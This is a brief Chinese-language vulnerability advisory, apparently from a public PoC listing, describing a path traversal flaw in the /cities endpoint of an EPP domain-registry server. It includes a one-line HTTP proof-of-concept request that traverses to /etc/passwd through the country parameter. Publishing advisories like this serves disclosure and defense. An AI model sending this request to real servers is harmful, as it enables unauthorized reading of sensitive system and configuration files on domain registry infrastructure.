EPP Server /cities 文件读取漏洞

2026-04-30 EPP Server PoC Public

Description

EPP Server(Extensible Provisioning Protocol Server)是负责处理域名注册、管理等相关协议的服务器系统,由域名注册局和注册商使用,是互联网域名基础设施的核心组件。EPP Server 提供域名的注册、续费、转移、查询等核心功能,支持多种顶级域名(TLD)的管理。该产品广泛应用于全球各地的域名注册服务机构。EPP Server /cities 接口存在路径遍历漏洞,攻击者可通过 country 参数读取服务器上的任意文件,如 /etc/passwd、配置文件等,造成敏感信息泄露。

PoC

GET /cities?country=/../../../../../../../../etc/passwd HTTP/1.1
Host:

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities